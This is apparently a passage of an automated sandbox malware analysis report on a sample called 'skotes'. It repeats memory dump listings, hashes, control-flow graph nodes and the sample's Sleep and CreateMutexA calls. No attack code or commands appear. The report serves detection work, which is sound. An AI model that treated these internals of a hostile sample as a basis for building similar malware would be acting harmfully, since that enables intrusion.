                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                • Opcode ID: 6b7c259f9cd0d8b915ef5af03662b25ce8ff64a84b9c5304580b07dd7ee0212f
                                                                                                                                                                                                                                • Instruction ID: 737eff60574526dd58dea5b9f1434f8aae447698932a8d5682029f12dd75c2b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b7c259f9cd0d8b915ef5af03662b25ce8ff64a84b9c5304580b07dd7ee0212f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE08C31040118AFCF35BF1AE81DD9C3B69FB61745F004815F81886226CB29EEA1C690

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 4ad5aa728c36e212d2aa9e049c58b27a9d24e856f5267d7c1f753b7cfa5afc93
                                                                                                                                                                                                                                • Instruction ID: 0265e3bef4796825eda82254795f3cd324892ca7bd587d40dae86302e7e227cd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ad5aa728c36e212d2aa9e049c58b27a9d24e856f5267d7c1f753b7cfa5afc93
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B312E71A14208CBEB18ABBCDC897BEB7B3EB85314F248259E1149B3D6C77959808761

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 22 6f9f44-6f9f64 26 6f9f66-6f9f72 22->26 27 6f9f92-6f9fae 22->27 30 6f9f88-6f9f8f call 70d663 26->30 31 6f9f74-6f9f82 26->31 28 6f9fdc-6f9ffb 27->28 29 6f9fb0-6f9fbc 27->29 35 6f9ffd-6fa009 28->35 36 6fa029-6fa916 call 7080c0 28->36 33 6f9fbe-6f9fcc 29->33 34 6f9fd2-6f9fd9 call 70d663 29->34 30->27 31->30 37 6fa92b 31->37 33->34 33->37 34->28 42 6fa01f-6fa026 call 70d663 35->42 43 6fa00b-6fa019 35->43 39 6fa953-6fa994 Sleep CreateMutexA 37->39 40 6fa92b call 726c6a 37->40 52 6fa9a7-6fa9a8 39->52 53 6fa996-6fa998 39->53 40->39 42->36 43->37 43->42 53->52 54 6fa99a-6fa9a5 53->54 54->52
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 28eb388e69667c7d7a1223e828afdf67b22e8d720abe386c283323aba64fdad0
                                                                                                                                                                                                                                • Instruction ID: 259813886f5e06d2d01327026b087016ccfe2435e4585d58bfe95cd045941878
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28eb388e69667c7d7a1223e828afdf67b22e8d720abe386c283323aba64fdad0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B314C71B11208CBEB18ABBCDC897BDB7A3EB85314F208259E118DB3D5C77959808722

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 56 6fa079-6fa099 60 6fa09b-6fa0a7 56->60 61 6fa0c7-6fa0e3 56->61 64 6fa0bd-6fa0c4 call 70d663 60->64 65 6fa0a9-6fa0b7 60->65 62 6fa0e5-6fa0f1 61->62 63 6fa111-6fa130 61->63 66 6fa107-6fa10e call 70d663 62->66 67 6fa0f3-6fa101 62->67 68 6fa15e-6fa916 call 7080c0 63->68 69 6fa132-6fa13e 63->69 64->61 65->64 70 6fa930-6fa994 call 726c6a Sleep CreateMutexA 65->70 66->63 67->66 67->70 74 6fa154-6fa15b call 70d663 69->74 75 6fa140-6fa14e 69->75 86 6fa9a7-6fa9a8 70->86 87 6fa996-6fa998 70->87 74->68 75->70 75->74 87->86 88 6fa99a-6fa9a5 87->88 88->86
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 2dbf8b6fb6ee5b0bf3ac40ad05b57eb48eeeef72738b7b0b25412f04009a1e77
                                                                                                                                                                                                                                • Instruction ID: adae89ed605c8d34ed11cf8aca1fb526bba46172538fad487dab1064c1cd56f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dbf8b6fb6ee5b0bf3ac40ad05b57eb48eeeef72738b7b0b25412f04009a1e77
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B3128B1B10208DBEB18DBFCDD897BDB773DB85314F208259E1189B3D5C77A59808612

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 90 6fa1ae-6fa1ce 94 6fa1fc-6fa218 90->94 95 6fa1d0-6fa1dc 90->95 98 6fa21a-6fa226 94->98 99 6fa246-6fa265 94->99 96 6fa1de-6fa1ec 95->96 97 6fa1f2-6fa1f9 call 70d663 95->97 96->97 100 6fa935 96->100 97->94 102 6fa23c-6fa243 call 70d663 98->102 103 6fa228-6fa236 98->103 104 6fa267-6fa273 99->104 105 6fa293-6fa916 call 7080c0 99->105 107 6fa953-6fa994 Sleep CreateMutexA 100->107 108 6fa935 call 726c6a 100->108 102->99 103->100 103->102 111 6fa289-6fa290 call 70d663 104->111 112 6fa275-6fa283 104->112 120 6fa9a7-6fa9a8 107->120 121 6fa996-6fa998 107->121 108->107 111->105 112->100 112->111 121->120 122 6fa99a-6fa9a5 121->122 122->120
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
